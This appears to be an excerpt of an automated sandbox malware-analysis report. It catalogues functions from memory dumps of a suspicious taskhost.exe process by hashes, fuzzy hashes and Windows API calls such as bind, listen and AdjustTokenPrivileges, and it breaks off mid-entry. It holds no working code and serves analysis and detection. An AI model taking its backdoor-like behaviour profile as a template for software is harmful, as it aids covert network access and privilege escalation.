                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `4J
                                                                      • API String ID: 0-1829626429
                                                                      • Opcode ID: 438dd9a3ff82564c44a73971fb4a7be5bd6508dec40ee9fa401365285faaa575
                                                                      • Instruction ID: 24c31a18d34b90627042f2785e72ff186a0a39f5c14e7d261f4fd5161f00934d
                                                                      • Opcode Fuzzy Hash: 438dd9a3ff82564c44a73971fb4a7be5bd6508dec40ee9fa401365285faaa575
                                                                      • Instruction Fuzzy Hash: A8B13FA0A1D78D4FEB46EB7884707683BE19F5B344F9501EAD089CB6E7DE685C448322
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E2967, Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `4J
                                                                      • API String ID: 0-1829626429
                                                                      • Opcode ID: 201ab12877e1501fabb9e3b10559069e747ee002b75553b38e21812208034c05
                                                                      • Instruction ID: 6effa6f6dfadc0aafa337a2629f5a5a53eec0358bd985f45b6047480d1d077af
                                                                      • Opcode Fuzzy Hash: 201ab12877e1501fabb9e3b10559069e747ee002b75553b38e21812208034c05
                                                                      • Instruction Fuzzy Hash: 1AA141A0A1D78D4FEB46EB7484707683BE19F5B344F9501EAD08DCB6E7DE685C448322
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E2DDE, Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: t4J
                                                                      • API String ID: 0-4115309232
                                                                      • Opcode ID: 5aeaa147b91ac739c462bceb8d07cef1bacc4e0ae6e85e870ba11fcfd1627bc2
                                                                      • Instruction ID: 60b732bc7ca47b74fa03bad9c078185b23cd9bb75842c57cc551180aaee470df
                                                                      • Opcode Fuzzy Hash: 5aeaa147b91ac739c462bceb8d07cef1bacc4e0ae6e85e870ba11fcfd1627bc2
                                                                      • Instruction Fuzzy Hash: 53518DA050D38A4FE7429F74C8657A57FA0AF47314F4A45EAE44CCB2E3DBB85908C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E0989, Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (6hK
                                                                      • API String ID: 0-672053336
                                                                      • Opcode ID: a606f6eda5149336b267f718c03396814c3bbb0b126a37a645e0694818860e7d
                                                                      • Instruction ID: cdda27b3e1951a4314cf11299f6d9cb3d660f6182274793d6776814ad87604de
                                                                      • Opcode Fuzzy Hash: a606f6eda5149336b267f718c03396814c3bbb0b126a37a645e0694818860e7d
                                                                      • Instruction Fuzzy Hash: 0C01F77264C7855FD345DB7888E97747BE2FF9A221B0A00F6D088CB1A3DE58984A8721
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E33BD, Relevance: .2, Instructions: 216COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7b73590ce40b0435815522cc4f066c51f8aa2baacd011a8a4947bd5fdc9c6ab7
                                                                      • Instruction ID: fd695eed65a97bc373a923bf1b2c81d4039e6786a7398291a0dd866b1cc45b6c
                                                                      • Opcode Fuzzy Hash: 7b73590ce40b0435815522cc4f066c51f8aa2baacd011a8a4947bd5fdc9c6ab7
                                                                      • Instruction Fuzzy Hash: 1D61B2A0F0D6890FEB46FB7485757AA67A2DF8A340F5640B6D04DCB7D7ED289C058321
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E0D4D, Relevance: .2, Instructions: 206COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b394c3d8ed8eadb3aa3f2a5b6db3bfbeb5d0bafcfedaf9c69d74123655ed2712
                                                                      • Instruction ID: 685cdd197fd7a7e921d960266061614667766e90dd5d13b8fa69af84513dc051
                                                                      • Opcode Fuzzy Hash: b394c3d8ed8eadb3aa3f2a5b6db3bfbeb5d0bafcfedaf9c69d74123655ed2712
                                                                      • Instruction Fuzzy Hash: E1512771B0CB494FEB89EB2C84A97B877D1EF59310F0541B9E44DC7293EE28A8458392
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E1F29, Relevance: .2, Instructions: 196COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5d0d3a13d219918641cbb0e443224e71e169868216ea03a35554c53224e314a
                                                                      • Instruction ID: 56126b48f425a7f86d08f315da40a7a31be73587559d20ed3264cb2ef927db04
                                                                      • Opcode Fuzzy Hash: d5d0d3a13d219918641cbb0e443224e71e169868216ea03a35554c53224e314a
                                                                      • Instruction Fuzzy Hash: A46187A0A0C7894FEB46AB74C8657A93BE1EF4A300F5540B6E44CCB6D7DEBC5C448361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E1C36, Relevance: .2, Instructions: 182COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dbc291980239682803fa36029aff058600f7b01945e44c3cc14c88b1859eb173
                                                                      • Instruction ID: 6242c2bbf5a382ef1d9615aec9c3d2ebd1cfc1f9d93c1649732ceabfad5c9bbc
                                                                      • Opcode Fuzzy Hash: dbc291980239682803fa36029aff058600f7b01945e44c3cc14c88b1859eb173
                                                                      • Instruction Fuzzy Hash: EB51EFB050C6899FE7429F24C9A47E93FE0FF06304F5541AAE84DCB193DBB89848C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E310D, Relevance: .2, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e784bba70a83aabdebd1c1bc35128773132636ac04020cd828e90eea022062d5
                                                                      • Instruction ID: 1b1a99c7dde7bd49e793ff89b21ae037681e517bc567c3b3ef8c7e86270fb9ec
                                                                      • Opcode Fuzzy Hash: e784bba70a83aabdebd1c1bc35128773132636ac04020cd828e90eea022062d5
                                                                      • Instruction Fuzzy Hash: BD517CB050D3C98FE7479B3488657557FA1AF47344F5A81EAE088CF1A3CAB89848C762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E2411, Relevance: .1, Instructions: 142COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f5e1c64c8cac44466adbe243035f2a415f43945c3fd0e5b154854f1e626c0ebc
                                                                      • Instruction ID: b368381203f43d4522f95b1cdd2096fc383bebfc1811137538ea956ab5f08522
                                                                      • Opcode Fuzzy Hash: f5e1c64c8cac44466adbe243035f2a415f43945c3fd0e5b154854f1e626c0ebc
                                                                      • Instruction Fuzzy Hash: C1416F71A18A498FEB85EF3CC465A69B7E1FF5A314F4504BDE40DCB296EA28D9008741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E2430, Relevance: .1, Instructions: 128COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 81110990425b6e6754eea1bcff16ae1e5437547488746f942b7ed474ded47c1c
                                                                      • Instruction ID: 3ccbc50204f892e14091ae73ddd482bd39cee95991916cddae8172324968c68a
                                                                      • Opcode Fuzzy Hash: 81110990425b6e6754eea1bcff16ae1e5437547488746f942b7ed474ded47c1c
                                                                      • Instruction Fuzzy Hash: 17414170B18A498FEF85FF3CC465A69B7E1FF5A314B4504BDE40DCB296EA28E9008741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E0449, Relevance: .1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4482d9aa114efdd215e64e860fa785feb20133c0c8c265375914e1e034945d74
                                                                      • Instruction ID: a856625898b89e34412fa6a1603319f9b82479205bebb1b91a34fc00f563140f
                                                                      • Opcode Fuzzy Hash: 4482d9aa114efdd215e64e860fa785feb20133c0c8c265375914e1e034945d74
                                                                      • Instruction Fuzzy Hash: EB31E461A1CB894FE786E73888A47747BD1EF5B210F5942FAD04DCB1E7DD199C058312
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E2581, Relevance: .1, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8fab9f2ed54982533c961cee509b8088cc3ed750a134ed72d0574714396165b2
                                                                      • Instruction ID: c8e53a326daef15c5fa9e79e4238602df4f3c2fe5f1746845fa65620a383d8bb
                                                                      • Opcode Fuzzy Hash: 8fab9f2ed54982533c961cee509b8088cc3ed750a134ed72d0574714396165b2
                                                                      • Instruction Fuzzy Hash: E231F7B540D78D8FEB419F14D8683A97FE0FF46304F4542AAE84C8B2E6DFB955088751
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E1A2D, Relevance: .1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 94a56f8d1ccc4f5870af5893ede7305eac7a046e37aee188b9f093147458dfa7
                                                                      • Instruction ID: 4367a50169432ceae6068ea0d909cfaaef393da76f274514ff17771e9f7acc80
                                                                      • Opcode Fuzzy Hash: 94a56f8d1ccc4f5870af5893ede7305eac7a046e37aee188b9f093147458dfa7
                                                                      • Instruction Fuzzy Hash: B5215BA150D7C25FE3575734C465AB17FA0AF17210F4E44EED4C8CF0A3EA599909C762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E3D30, Relevance: .1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6a721d1161e6c71c139b79d18ac86d744e6dd48acbe15c0e9fd8f142537a8d33
                                                                      • Instruction ID: 599cd75c2c497cbee0d8b274c0d0316bc8259505201d89e2d91287831852ad51
                                                                      • Opcode Fuzzy Hash: 6a721d1161e6c71c139b79d18ac86d744e6dd48acbe15c0e9fd8f142537a8d33
                                                                      • Instruction Fuzzy Hash: 06112A71A087458FDB45DF1CC4C4A55BBF0FFAA300B0545AAE88CCB252DB74E981CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E0A09, Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ce9161c448c2190fa845175c146bfabe5168adebc3e92a327b0e682e48896b41
                                                                      • Instruction ID: 025b28afe11a489e9bde5021b8ce84cb21fe8c2027268f65656d337cd06f27d5
                                                                      • Opcode Fuzzy Hash: ce9161c448c2190fa845175c146bfabe5168adebc3e92a327b0e682e48896b41
                                                                      • Instruction Fuzzy Hash: A3017D3054D78F4FD705976898D06F13BA1EF8B210F1A81FAC00DC7163D55D998A8391
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E3225, Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d0e71cd9c4b66e077e6eb9876708bbb57effa7d1822623a09566a60c17eb4612
                                                                      • Instruction ID: 8850684f033daf347dd3c21f27bd7eecd63fe911770cd9ffadc6fba965a4cb31
                                                                      • Opcode Fuzzy Hash: d0e71cd9c4b66e077e6eb9876708bbb57effa7d1822623a09566a60c17eb4612
                                                                      • Instruction Fuzzy Hash: 19F0A4B160C6494FEB129F64C4A07A97BA0AF47340F5641F7D48DCB1D7CA7C98588352
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E0A91, Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7df2c025eaf7b5265c9c41fbc8d53f834dad4d29b85809777028eb40a67df133
                                                                      • Instruction ID: 15ac97660e85a675cd6eaab13a2ed30635dd2d788cdf90486ba79f1be0698d70
                                                                      • Opcode Fuzzy Hash: 7df2c025eaf7b5265c9c41fbc8d53f834dad4d29b85809777028eb40a67df133
                                                                      • Instruction Fuzzy Hash: FAE06D30B15E0B5B9A88EB2E98D166433D2FB582117814535D40EC62C6DA59ECD187D2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E0A68, Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0e59fd999406a8b60eb692dc14bcd6f416f71a8a6d98ee1e8170eb622203e38
                                                                      • Instruction ID: d907561243fa784ca9a44105726628a2ce2d0d89677158ef0590a9163d5f0560
                                                                      • Opcode Fuzzy Hash: b0e59fd999406a8b60eb692dc14bcd6f416f71a8a6d98ee1e8170eb622203e38
                                                                      • Instruction Fuzzy Hash: 1CE03030718A0A4FCA84EB1EC4D0A2473D2FF983107018575D40DC3295CE69FC85C782
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E05D3, Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ca7a225c7db6ffc04d2a6dc3f3f2a53df5b4c1ee91ba6f0929db5e13c2b73dcd
                                                                      • Instruction ID: 3128354202cdf30bba2aa437bb242090c03a74b84e907b3a4747399e3e47508d
                                                                      • Opcode Fuzzy Hash: ca7a225c7db6ffc04d2a6dc3f3f2a53df5b4c1ee91ba6f0929db5e13c2b73dcd
                                                                      • Instruction Fuzzy Hash: 1EE0E66174CA0D0BDA44FBA8E4457F873C1FB98322F44457BE148C2253DA5DE5459741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E015D, Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 57a02ecad96ad313cda2875ded245d0a7008373f153ebaf634ee9e07d2c3649b
                                                                      • Instruction ID: afc3158772d1cc3046afc8822b7ad1cb4fb6ffc7b1ee1a2e61ef3dbc56abfdfa
                                                                      • Opcode Fuzzy Hash: 57a02ecad96ad313cda2875ded245d0a7008373f153ebaf634ee9e07d2c3649b
                                                                      • Instruction Fuzzy Hash: F7C08072D6850317D284677608D777812D5AF46780B428078D10F864D3DC5CA85D4F11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: taskhost.exe PID: 4548 Parent PID: 2432 taskhost.exeCOMMON

                                                                      Executed Functions

                                                                      Function 0520603F, Relevance: 7.9, Strings: 6, Instructions: 379COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :@:r$:@:r$:@:r$:@:r$:@:r$:@:r
                                                                      • API String ID: 0-1552953164
                                                                      • Opcode ID: d82f14e11d0d8e8c303359a6514fafd7f030902b1d5f148b871207b42f27add7
                                                                      • Instruction ID: 1389385945e8ea8d1f9348332da2c1b81763aea8e23d2a374dab1190c024f10c
                                                                      • Opcode Fuzzy Hash: d82f14e11d0d8e8c303359a6514fafd7f030902b1d5f148b871207b42f27add7
                                                                      • Instruction Fuzzy Hash: F902C674A412288FDB64DF64C854BEEBBB2EF8A304F1090E9DA4963390DB355E91CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05208D5F, Relevance: 5.9, Strings: 4, Instructions: 936COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :@:r$:@:r$:@:r$:@:r
                                                                      • API String ID: 0-1005175706
                                                                      • Opcode ID: 05fbacadbeee03ecf613b4dd991641bee59e2b7c534bc76463aab7a850337f69
                                                                      • Instruction ID: 1fa49831d7422171998be2cbc5017c932c479e66e22e3769ccf6101501b9a172
                                                                      • Opcode Fuzzy Hash: 05fbacadbeee03ecf613b4dd991641bee59e2b7c534bc76463aab7a850337f69
                                                                      • Instruction Fuzzy Hash: 68A2D274A02228DFDB65DF68C894B9DBBB2EF8A304F1051E9990C673A0DB355E81CF15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05209596, Relevance: 3.0, Strings: 2, Instructions: 539COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :@:r$:@:r
                                                                      • API String ID: 0-2124224625
                                                                      • Opcode ID: 0e63ee8bea5d6c503bbc85bc9e74d3743a374f0fef36f5a7749bc6b71630f2b5
                                                                      • Instruction ID: 04c3b8e86dad53db5fc53efd3e574834c8cd129139feb38e7907c04197d770d4
                                                                      • Opcode Fuzzy Hash: 0e63ee8bea5d6c503bbc85bc9e74d3743a374f0fef36f5a7749bc6b71630f2b5
                                                                      • Instruction Fuzzy Hash: 5C42D234A02228DFDB65DF68C894B9DBBB2EF89304F1091E9990C673A0DB355E81CF14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052094AC, Relevance: 3.0, Strings: 2, Instructions: 539COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :@:r$:@:r
                                                                      • API String ID: 0-2124224625
                                                                      • Opcode ID: d9ff42c91cf5ee2507834337af165d80d387941438377dae11bb72b62d1b379b
                                                                      • Instruction ID: ac4a09a3e36152ff9af3b1025d92384623708cae470e84c5458c03b16c166ba6
                                                                      • Opcode Fuzzy Hash: d9ff42c91cf5ee2507834337af165d80d387941438377dae11bb72b62d1b379b
                                                                      • Instruction Fuzzy Hash: D042D234A02228CFDB65DF68C894B9DBBB2EF89304F1091E9990C673A0DB355E81CF14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0520985B, Relevance: 3.0, Strings: 2, Instructions: 535COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :@:r$:@:r
                                                                      • API String ID: 0-2124224625
                                                                      • Opcode ID: f6078c323c98369b98a7d2f027c67a5e551b1f6727381d41eaafc9f65a8c904b
                                                                      • Instruction ID: df2b9d2bc8f79f8b1dd16ee5bbe4f31e6a1f6f6d104dc52b273bf2b325426cf9
                                                                      • Opcode Fuzzy Hash: f6078c323c98369b98a7d2f027c67a5e551b1f6727381d41eaafc9f65a8c904b
                                                                      • Instruction Fuzzy Hash: BF42C134A02228DFDB65DF68C898B9DBBB2EF89304F1051E9990D673A0DB355E81CF15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05207920, Relevance: 2.0, APIs: 1, Instructions: 465libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 7cab02727950dfa0b10dcc7334dd2e4e728e331b820d027eaaa2b9ab626b8b9c
                                                                      • Instruction ID: a96df84de4ae8734f85e0b6aa025614d50196a9989d4a3edfa33aef2b724e672
                                                                      • Opcode Fuzzy Hash: 7cab02727950dfa0b10dcc7334dd2e4e728e331b820d027eaaa2b9ab626b8b9c
                                                                      • Instruction Fuzzy Hash: 4632A274941229CFCB65DF24C994BEDB7B2BF4A304F1085EAD809A7250DB75AE85CF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05290E6B, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • bind.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290EFF
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: bind
                                                                      • String ID:
                                                                      • API String ID: 1187836755-0
                                                                      • Opcode ID: 5e1d4dd7b476f82c6b23add0c4e26c9c099c8160790df2997effb8a0ddd95882
                                                                      • Instruction ID: 890ae8027082413c8714c25488a4e58d885a088250f1eec2beac839c7f2f54d9
                                                                      • Opcode Fuzzy Hash: 5e1d4dd7b476f82c6b23add0c4e26c9c099c8160790df2997effb8a0ddd95882
                                                                      • Instruction Fuzzy Hash: F2219471509384AFDB12CB65CC44F96BFB8EF46310F1884ABE984DF252D274A905C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05290A50, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • listen.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290AE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: listen
                                                                      • String ID:
                                                                      • API String ID: 3257165821-0
                                                                      • Opcode ID: d4a341d873db5c9ddfd6f15d76d2f0c860e2c119715762d9270657146b4794ac
                                                                      • Instruction ID: 2b5c73b03e1ba5361d7a355048ea54fe25cac4ea2dd88aaefc34a4a6074ccdab
                                                                      • Opcode Fuzzy Hash: d4a341d873db5c9ddfd6f15d76d2f0c860e2c119715762d9270657146b4794ac
                                                                      • Instruction Fuzzy Hash: 0921E571405384AFEB12CB54DC45F66BFA8FF46320F0880ABEA449F252D274A905C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05294E1B, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05294E9B
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdjustPrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 2874748243-0
                                                                      • Opcode ID: 629cc81ef0db477b9b1efc9a4f4102e3d71f57e3867199487b4f384da3902320
                                                                      • Instruction ID: 52933f9f2df7623a2824e62b50acc51ef49ffa315018d9c1109d428376767f79
                                                                      • Opcode Fuzzy Hash: 629cc81ef0db477b9b1efc9a4f4102e3d71f57e3867199487b4f384da3902320
                                                                      • Instruction Fuzzy Hash: E2219F75509784AFDB26CF25DC40F62BFF4FF06210F08859AE9898F263D2719918DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05292D4A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetAdaptersInfo.IPHLPAPI(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05292DC8
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdaptersInfo
                                                                      • String ID:
                                                                      • API String ID: 3177971545-0
                                                                      • Opcode ID: df6bcc2ef044959ef57cffd49268caf63876acfe25cafa9a3a2765ecc0ed32fd
                                                                      • Instruction ID: a1f492a89164ef2a2dbfa8323b59d1946920aa38b1e47fbacef38c4ae8a43ad1
                                                                      • Opcode Fuzzy Hash: df6bcc2ef044959ef57cffd49268caf63876acfe25cafa9a3a2765ecc0ed32fd
                                                                      • Instruction Fuzzy Hash: 6421B771409384AFDB12CB15CC45FA6FFB8EF46310F0884DBE9849B252C264A408C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05290E9E, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • bind.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290EFF
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: bind
                                                                      • String ID:
